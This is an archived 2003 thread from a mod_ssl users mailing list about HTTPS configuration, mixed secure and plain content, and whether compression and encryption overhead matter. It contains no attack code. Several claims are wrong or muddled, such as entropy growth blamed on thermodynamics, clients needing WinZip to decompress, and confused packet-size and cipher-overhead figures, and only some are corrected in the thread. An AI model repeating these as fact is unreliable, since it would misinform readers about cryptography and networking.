X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Add
Listen 443

On Sunday 17 August 2003 9:15 am, nico wrote:
> Hello
>
> So I start with Linux/Apache and openssl and I can't get running Apache 2
> and Openssl.
>
> That's an extract of my httpd.conf
>
> Listen 80
>
> 
> 
>
> DocumentRoot "/usr/local/apache/htdocs"
> ServerName www.test.com
> ServerAdmin test
> ErrorLog /usr/local/apache/logs/error_log
> TransferLog /usr/local/apache/logs/access_log
>
> SSLEngine on
> SSLCertificateFile /usr/local/apache/conf/ssl.crt/www.test.com.cert
> SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/www.test.com.key
> 
> 
>
> When I try to connect with my brownser on http://www.test.com => it's OK
> but with https://www.test.com => My brownser return me :"Unkown socket
> type"
>
> If I try to connect me with shell to openssl it works.
>
> I  start apache with
>
> /usr/local/apache/bin/apachectl startssl
>
> => openssl prompt me for the pass
>
> I give him the pass all is OK apache start http work but https doens't work
> at all
>
> Thanks for your help

-- 
---
Take care,
Randy Katz
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 08:11:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 93B58A8963; Tue, 19 Aug 2003 08:11:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sccrmhc13.comcast.net (sccrmhc13.comcast.net [204.127.202.64])
	by master.modssl.org (Postfix) with ESMTP id 27A57A8933
	for ; Tue, 19 Aug 2003 08:11:36 +0200 (CEST)
Received: from minime.comcast.net (12-207-73-34.client.attbi.com[12.207.73.34](untrusted sender))
          by comcast.net (sccrmhc13) with SMTP
          id <200308190611340160087m43e>
          (Authid: hbentel);
          Tue, 19 Aug 2003 06:11:34 +0000
Message-Id: <5.2.1.1.0.20030820005840.00a959d8@pop.earthlink.net>
X-Sender: hbentel@mail.comcast.net
X-Mailer: QUALCOMM Windows Eudora Version 5.2.1
Date: Wed, 20 Aug 2003 01:11:30 -0500
To: modssl-users@modssl.org
From: Henrik Bentel 
Subject: configuration question
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Henrik Bentel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi

I have a web app which serves both static and non static content, both 
secure and unsecure(https and http).
Now, all my ssl configuration is under my secure virtual host, such that it 
applies to everything. However, I have quite a bit static content(images, 
css, javascript.,...) which doesn't need to be very secure. I somewhat only 
want to secure my dynamic content.
But, I don't want to generate absolute URLs on the fly to link to 
non-secure static content. What I want is to make request to certain urls 
"less secure" such that processing is faster. For example, I have a 
directory called art, which is just a defined alias for a directory. Is 
there a way to make ssl processing for this directory less restrictive than 
for the "generic requests" to the virtual host so that processing is faster?

Home someone can help

Henrik Bentel

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 08:22:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E0A2EA8966; Tue, 19 Aug 2003 08:22:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 6EA02A8940
	for ; Tue, 19 Aug 2003 08:22:42 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.9/8.12.8/UVACS-2003031900) with ESMTP id h7J6MVL9007271;
	Tue, 19 Aug 2003 02:22:32 -0400 (EDT)
Date: Tue, 19 Aug 2003 02:22:31 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: Henrik Bentel 
Cc: modssl-users@modssl.org
Subject: Re: configuration question
In-Reply-To: <5.2.1.1.0.20030820005840.00a959d8@pop.earthlink.net>
Message-ID: 
References: <5.2.1.1.0.20030820005840.00a959d8@pop.earthlink.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 20 Aug 2003, Henrik Bentel wrote:

> Now, all my ssl configuration is under my secure virtual host, such that it
> applies to everything. However, I have quite a bit static content(images,
> css, javascript.,...) which doesn't need to be very secure. I somewhat only
> want to secure my dynamic content.

If I understand your question correctly, what you're wanting is to have
some web page that's served up with https, but to have the images on that
page be served by regular http.  You could do that, but every browser I
know of will throw a security warning in that case.  You can't mix secure
and non-secure content in the same document.

Does that answer your question?

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 10:49:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id ED489A8963; Tue, 19 Aug 2003 10:49:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 68209A8933
	for ; Tue, 19 Aug 2003 10:49:46 +0200 (CEST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.9/8.12.9) with ESMTP id h7J8nj1U008855
	for ; Tue, 19 Aug 2003 10:49:45 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.9/8.12.9) with ESMTP id h7J8ni6O005904
	for ; Tue, 19 Aug 2003 10:49:44 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: configuration question
Date: Tue, 19 Aug 2003 10:49:44 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: configuration question
Importance: normal
thread-index: AcNmGOhenFcEwCqCSz+OKBlSwMJZ/AAE8Yuw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Henrik Bentel [mailto:hbentel@comcast.net]
>
>I have a web app which serves both static and non static content, both=20
>secure and unsecure(https and http).
>Now, all my ssl configuration is under my secure virtual host,=20
>such that it applies to everything. However, I have quite a bit static=20
>content(images, css, javascript.,...) which doesn't need to be very
secure. I=20
>somewhat only want to secure my dynamic content.

To add to Cliff's comment about browsers complaining about the mix of
secure an insecure content there is a genuine security reason for *not*
doing what you propose.

Put yourself in the position of a crook who has gained access to the
datastream flowing into your SSL server. As you are probably aware, all
encryption ciphers can be cracked by a brute force attack (making
repeated attempts at guesssing the key). Hopefully, the time-to-crack
will be "long", but you don't know how fast the crook's computer is. If
he works for the NSA, it might be very fast indeed. If you serve all
content via SSL, he has no idea which packets are important and which
are just images etc. so he has to crack everything. If you decide to
save a teeny bit of processing on the server by encrypting only the
important things, he then sees lots of "en clair" packets (containing
image data etc.) which he can safely ignore and only a few occasional
nuggets of encrypted data which he can be sure are worth cracking. Thus
he can focus his efforts on these. Therefore, you make life easy for the
cracker by highlighting the packets that are worth cracking! In other
words, the best place to hide a leaf is in the forest.

You shouldn't need to worry about the processing load of the SSL
encryption. If it is slowing your server, then, frankly, your server is
not powerful enough to serve the traffic you have - get more memory,
upgrade the chipset, do whatever is necessary to get up to speed.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

>But, I don't want to generate absolute URLs on the fly to link to=20
>non-secure static content. What I want is to make request to=20
>certain urls=20
>"less secure" such that processing is faster. For example, I have a=20
>directory called art, which is just a defined alias for a=20
>directory. Is=20
>there a way to make ssl processing for this directory less=20
>restrictive than=20
>for the "generic requests" to the virtual host so that=20
>processing is faster?
>
>Home someone can help
>
>Henrik Bentel
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange.
This e-mail is of a private and personal nature. It is not related to
the exchange or business activities of the SWX Swiss Exchange. Le
pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport avec
l'activit=E9 boursi=E8re de la SWX Swiss Exchange.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 11:29:52 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 82DBEA8963; Tue, 19 Aug 2003 11:29:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id 331EEA8933
	for ; Tue, 19 Aug 2003 11:29:50 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h7J9TkQ6004571 for ; Tue, 19 Aug 2003 17:29:47 +0800 (CST)
Message-ID: <001401c36633$014b8e80$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: 
Subject: Re: configuration question
Date: Tue, 19 Aug 2003 17:19:30 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Boyle,
I've been debating with myself over whether to encrypt everything, that's a
cogent argument you have offered. I have a few questions myself :
(1) assuming an openssl encrypted packet is bigger than a plain text one,
would mod_gzip shrink it significantly to warrant the effort?
(2) and would that slow down the client browser display of content ?
On the other hand, with these new  1GHz+ P4 desk- and lap-tops around, maybe
not.

----- Original Message -----
From: "Boyle Owen" 
To: 
Sent: Tuesday, August 19, 2003 04:49 PM
Subject: RE: configuration question


>-----Original Message-----
>From: Henrik Bentel [mailto:hbentel@comcast.net]
>
>I have a web app which serves both static and non static content, both
>secure and unsecure(https and http).
>Now, all my ssl configuration is under my secure virtual host,
>such that it applies to everything. However, I have quite a bit static
>content(images, css, javascript.,...) which doesn't need to be very
secure. I
>somewhat only want to secure my dynamic content.

To add to Cliff's comment about browsers complaining about the mix of
secure an insecure content there is a genuine security reason for *not*
doing what you propose.

Put yourself in the position of a crook who has gained access to the
datastream flowing into your SSL server. As you are probably aware, all
encryption ciphers can be cracked by a brute force attack (making
repeated attempts at guesssing the key). Hopefully, the time-to-crack
will be "long", but you don't know how fast the crook's computer is. If
he works for the NSA, it might be very fast indeed. If you serve all
content via SSL, he has no idea which packets are important and which
are just images etc. so he has to crack everything. If you decide to
save a teeny bit of processing on the server by encrypting only the
important things, he then sees lots of "en clair" packets (containing
image data etc.) which he can safely ignore and only a few occasional
nuggets of encrypted data which he can be sure are worth cracking. Thus
he can focus his efforts on these. Therefore, you make life easy for the
cracker by highlighting the packets that are worth cracking! In other
words, the best place to hide a leaf is in the forest.

You shouldn't need to worry about the processing load of the SSL
encryption. If it is slowing your server, then, frankly, your server is
not powerful enough to serve the traffic you have - get more memory,
upgrade the chipset, do whatever is necessary to get up to speed.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.

>But, I don't want to generate absolute URLs on the fly to link to
>non-secure static content. What I want is to make request to
>certain urls
>"less secure" such that processing is faster. For example, I have a
>directory called art, which is just a defined alias for a
>directory. Is
>there a way to make ssl processing for this directory less
>restrictive than
>for the "generic requests" to the virtual host so that
>processing is faster?
>
>Home someone can help
>
>Henrik Bentel
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss Exchange.
This e-mail is of a private and personal nature. It is not related to
the exchange or business activities of the SWX Swiss Exchange. Le
présent e-mail est un message privé et personnel, sans rapport avec
l'activité boursière de la SWX Swiss Exchange.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 13:02:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7C31FA8966; Tue, 19 Aug 2003 13:02:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 04E2AA8940
	for ; Tue, 19 Aug 2003 13:02:24 +0200 (CEST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.9/8.12.9) with ESMTP id h7JB2N1U019995
	for ; Tue, 19 Aug 2003 13:02:23 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.9/8.12.9) with ESMTP id h7JB2M6O010381
	for ; Tue, 19 Aug 2003 13:02:22 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: RE: configuration question
Date: Tue, 19 Aug 2003 13:02:21 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: configuration question
Thread-Index: AcNmNJdbLMbv+SXMQEGdh6dNG+1n/AACqysA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



>-----Original Message-----
>From: Arthur Chan [mailto:achana@saysit.com.hk]
>
>Hi Boyle,
>I've been debating with myself over whether to encrypt=20
>everything, that's a
>cogent argument you have offered. I have a few questions myself :
>(1) assuming an openssl encrypted packet is bigger than a=20
>plain text one,

Why would you assume this? Essentially;

	encrypted_text =3D f(plain_text, key)

where f() is a mathematical function. I guess the 2nd law of =
thermodynamics ("entropy increases") would tend to cause the output to =
increase but not necessarily by much. In the simple case of a =
substitutional cipher, the encrypted text would be precisely the same =
size as the plain text.

>would mod_gzip shrink it significantly to warrant the effort?

Zipping algorithms work by replacing repetitive sequences in the input =
with shorter instructions to regenerate them (e.g. 1000 blue pixels -> =
"1 blue pixel x 1000"). Compression works best with highly structured =
input data (bitmaps, WAV files, human language etc). With random data, =
it can't make much difference and will even cause the file to grow! (try =
repeatedly zipping a file to see this happening).

>(2) and would that slow down the client browser display of content ?

Unzipping requires the client to have winzip - not a default on a =
windows client! Probably this would slow the whole thing down.

Remember that SSL is well-defined on the web and all recent browsers =
contain fast and effective SSL software - I would trust it to do its job =
and not try to re-invent the wheel.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

>On the other hand, with these new  1GHz+ P4 desk- and lap-tops=20
>around, maybe
>not.
>
>----- Original Message -----
>From: "Boyle Owen" 
>To: 
>Sent: Tuesday, August 19, 2003 04:49 PM
>Subject: RE: configuration question
>
>
>>-----Original Message-----
>>From: Henrik Bentel [mailto:hbentel@comcast.net]
>>
>>I have a web app which serves both static and non static content, both
>>secure and unsecure(https and http).
>>Now, all my ssl configuration is under my secure virtual host,
>>such that it applies to everything. However, I have quite a bit static
>>content(images, css, javascript.,...) which doesn't need to be very
>secure. I
>>somewhat only want to secure my dynamic content.
>
>To add to Cliff's comment about browsers complaining about the mix of
>secure an insecure content there is a genuine security reason for *not*
>doing what you propose.
>
>Put yourself in the position of a crook who has gained access to the
>datastream flowing into your SSL server. As you are probably aware, all
>encryption ciphers can be cracked by a brute force attack (making
>repeated attempts at guesssing the key). Hopefully, the time-to-crack
>will be "long", but you don't know how fast the crook's computer is. If
>he works for the NSA, it might be very fast indeed. If you serve all
>content via SSL, he has no idea which packets are important and which
>are just images etc. so he has to crack everything. If you decide to
>save a teeny bit of processing on the server by encrypting only the
>important things, he then sees lots of "en clair" packets (containing
>image data etc.) which he can safely ignore and only a few occasional
>nuggets of encrypted data which he can be sure are worth cracking. Thus
>he can focus his efforts on these. Therefore, you make life=20
>easy for the
>cracker by highlighting the packets that are worth cracking! In other
>words, the best place to hide a leaf is in the forest.
>
>You shouldn't need to worry about the processing load of the SSL
>encryption. If it is slowing your server, then, frankly, your server is
>not powerful enough to serve the traffic you have - get more memory,
>upgrade the chipset, do whatever is necessary to get up to speed.
>
>Rgds,
>Owen Boyle
>Disclaimer: Any disclaimer attached to this message may be ignored.
>
>>But, I don't want to generate absolute URLs on the fly to link to
>>non-secure static content. What I want is to make request to
>>certain urls
>>"less secure" such that processing is faster. For example, I have a
>>directory called art, which is just a defined alias for a
>>directory. Is
>>there a way to make ssl processing for this directory less
>>restrictive than
>>for the "generic requests" to the virtual host so that
>>processing is faster?
>>
>>Home someone can help
>>
>>Henrik Bentel
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
>keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss=20
>Exchange.
>This e-mail is of a private and personal nature. It is not related to
>the exchange or business activities of the SWX Swiss Exchange. Le
>pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport avec
>l'activit=E9 boursi=E8re de la SWX Swiss Exchange.
>
>This message is for the named person's use only. It may contain
>confidential, proprietary or legally privileged information. No
>confidentiality or privilege is waived or lost by any mistransmission.
>If you receive this message in error, please notify the sender urgently
>and then immediately delete the message and any copies of it from your
>system. Please also immediately destroy any hardcopies of the message.
>You must not, directly or indirectly, use, disclose, distribute, print,
>or copy any part of this message if you are not the intended recipient.
>The sender's company reserves the right to monitor all e-mail
>communications through their networks. Any views expressed in this
>message are those of the individual sender, except where the message
>states otherwise and the sender is authorised to state them to be the
>views of the sender's company.
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat =
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange. This e-mail is of a private and personal nature. It is not =
related to the exchange or business activities of the SWX Swiss =
Exchange. Le pr=E9sent e-mail est un message priv=E9 et personnel, sans =
rapport avec l'activit=E9 boursi=E8re de la SWX Swiss Exchange.=20

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 14:02:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6037FA8966; Tue, 19 Aug 2003 14:02:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ghost.pobox.com (ghost.pobox.com [208.210.125.55])
	by master.modssl.org (Postfix) with ESMTP id 7A614A8940
	for ; Tue, 19 Aug 2003 14:02:00 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by ghost.pobox.com (Postfix) with ESMTP id A680C2BDF9F
	for ; Tue, 19 Aug 2003 08:01:57 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id C81474541B
	for ; Tue, 19 Aug 2003 07:58:47 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: configuration question
Date: Tue, 19 Aug 2003 07:58:49 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

In addition to Owen's salient points about compression working efficiently
on repetitive strings in plaintext/binary data (e.g. whitespace in a Word
document) and not on random data (e.g. encrypted data), some encryption
algorithms can actually be weakened by compressing the resulting data,
giving a cryptanalyzer clues to the inner workings of the algorithm.

The bottom line here is that SSL works on the socket/transport layer and not
at the application layer.  If you're generating a .gz file on-the-fly within
Apache (mod_gzip, etc), the result will still be encrypted *after*
compression.  The output chain of Apache applies SSL as the last stage, so
something like mod_gzip will operate *before* SSL.  Most modern browsers
produced in the last four or five years will decompress a .gz file (not
.zip!) for the user - even on Windows (just tested IE6 on XP .. works fine).
If you've ever experimented with VRML, one "best practices" is to send files
as .wrl.gz and not straight .wrl.

As for SSL packets being larger - they're not to any appreciable degree -
for the exact reason Owen pointed out below.  Even symmetric cipher
algorithms don't produce appreciably larger amounts of data.  For example,
using Chained Block Cipher (CBC) mode will only increase the amount of data
by 8 bytes from adding an Initialization Vector (IV) to the beginning of the
ciphertext and padding the end of the ciphertext to get a complete final
block (with an 8 byte block cipher like Blowfish, the largest amount of
padding will only be 7 bytes).  So, at most, you've added 15 bytes to even
the largest amount of plaintext data using Blowfish in CBC mode.  There are
a few exotic exceptions here, like interleaved chaining block ciphers which
will add an IV (of the same size as above) per parallel operation (so if
you've got four parallel encryption operations using interleaved CBC, you're
adding 24 bytes at the beginning of the ciphertext).  However, these are
exceptionally rare and typically limited to proprietary
implementations/applications.

Addressing one other misconception here.. a packet can contain up to 1500
bytes - including headers (assuming your network handles MTUs of 1500, some
are less (like ATM @ 53 bytes [48 bytes of payload w/5 bytes of header),
some are more (like Frame Relay @ up to 4500 bytes), but hey, not many
desktops are connected with ATM or Frame, so we'll call the connection
standard ethernet with a MTU of 1500.  The way networks operate and packets
are forwarded, smaller packets actually transmit *less* data for any given
amount of time over larger packets.  Switches and routers (OSI layer 2 and 3
devices) operate on packet forwarding rates, regardless of the amount of
data in the packet.  The more data in the packet, the more data you're going
to get for X period of time - this is one factor that introduces latency
into a network.  Lots of small packets going through a network simply
transmit less data than lots of large packets .. and since the only
appreciable metric is the number of packets and the packet forwarding rate
of the network device, the larger the packet, the happier the network and
the more data getting to the end user.  The *only* place this is going to
make a difference is if you've got an -inline- intrusion
detection/prevension system (IDS/IPS), in which case you've got what most
network engineers would consider to be a design flaw anyway.  In this case,
each packet needs to be inspected and the more data there is, the more there
is to be inspected.  Most IDS sensors will simply discard packets being
inspected rather than slow the network down (Snort does this when it's
either misconfigured or overloaded).

So.. go for it.  Use mod_gzip (or similar) to generate .gz docs on the fly
.. let Apache handle your SSL.  If anything, your win comes from SSL having
to encrypt *less* data.  This won't speed up the handshake phase, but will
speed up the rest of the transaction since there's simply less data to
encrypt and transmit.  How much speed improvement you get is completely
dependent on how much compression you're getting.  If you can take a 100K
document and compress it to 25K, that's a 75% reduction in the amount of
data SSL needs to encrypt and reduces the number of packets from about 66 to
around 16 - again, not including the SSL handshake/setup and general TCP
setup/teardown.

If you're bogging down your server with all the SSL transactions, look at
investing in a SSL accelerator.  If your business model depends on both
security *and* performance, then the cost (starting around 20K$USD) should
be easily justified.  But that's the subject of another mail and I've got
some coffee getting cold over here. ;-)

Hope this didn't glaze your eyes over. :-)
Best~
-dsp


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Boyle Owen
Sent: Tuesday, August 19, 2003 7:02 AM
To: modssl-users@modssl.org
Subject: RE: configuration question




>-----Original Message-----
>From: Arthur Chan [mailto:achana@saysit.com.hk]
>
>Hi Boyle,
>I've been debating with myself over whether to encrypt
>everything, that's a
>cogent argument you have offered. I have a few questions myself :
>(1) assuming an openssl encrypted packet is bigger than a
>plain text one,

Why would you assume this? Essentially;

	encrypted_text = f(plain_text, key)

where f() is a mathematical function. I guess the 2nd law of thermodynamics
("entropy increases") would tend to cause the output to increase but not
necessarily by much. In the simple case of a substitutional cipher, the
encrypted text would be precisely the same size as the plain text.

>would mod_gzip shrink it significantly to warrant the effort?

Zipping algorithms work by replacing repetitive sequences in the input with
shorter instructions to regenerate them (e.g. 1000 blue pixels -> "1 blue
pixel x 1000"). Compression works best with highly structured input data
(bitmaps, WAV files, human language etc). With random data, it can't make
much difference and will even cause the file to grow! (try repeatedly
zipping a file to see this happening).

>(2) and would that slow down the client browser display of content ?

Unzipping requires the client to have winzip - not a default on a windows
client! Probably this would slow the whole thing down.

Remember that SSL is well-defined on the web and all recent browsers contain
fast and effective SSL software - I would trust it to do its job and not try
to re-invent the wheel.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.

>On the other hand, with these new  1GHz+ P4 desk- and lap-tops
>around, maybe
>not.
>
>----- Original Message -----
>From: "Boyle Owen" 
>To: 
>Sent: Tuesday, August 19, 2003 04:49 PM
>Subject: RE: configuration question
>
>
>>-----Original Message-----
>>From: Henrik Bentel [mailto:hbentel@comcast.net]
>>
>>I have a web app which serves both static and non static content, both
>>secure and unsecure(https and http).
>>Now, all my ssl configuration is under my secure virtual host,
>>such that it applies to everything. However, I have quite a bit static
>>content(images, css, javascript.,...) which doesn't need to be very
>secure. I
>>somewhat only want to secure my dynamic content.
>
>To add to Cliff's comment about browsers complaining about the mix of
>secure an insecure content there is a genuine security reason for *not*
>doing what you propose.
>
>Put yourself in the position of a crook who has gained access to the
>datastream flowing into your SSL server. As you are probably aware, all
>encryption ciphers can be cracked by a brute force attack (making
>repeated attempts at guesssing the key). Hopefully, the time-to-crack
>will be "long", but you don't know how fast the crook's computer is. If
>he works for the NSA, it might be very fast indeed. If you serve all
>content via SSL, he has no idea which packets are important and which
>are just images etc. so he has to crack everything. If you decide to
>save a teeny bit of processing on the server by encrypting only the
>important things, he then sees lots of "en clair" packets (containing
>image data etc.) which he can safely ignore and only a few occasional
>nuggets of encrypted data which he can be sure are worth cracking. Thus
>he can focus his efforts on these. Therefore, you make life
>easy for the
>cracker by highlighting the packets that are worth cracking! In other
>words, the best place to hide a leaf is in the forest.
>
>You shouldn't need to worry about the processing load of the SSL
>encryption. If it is slowing your server, then, frankly, your server is
>not powerful enough to serve the traffic you have - get more memory,
>upgrade the chipset, do whatever is necessary to get up to speed.
>
>Rgds,
>Owen Boyle
>Disclaimer: Any disclaimer attached to this message may be ignored.
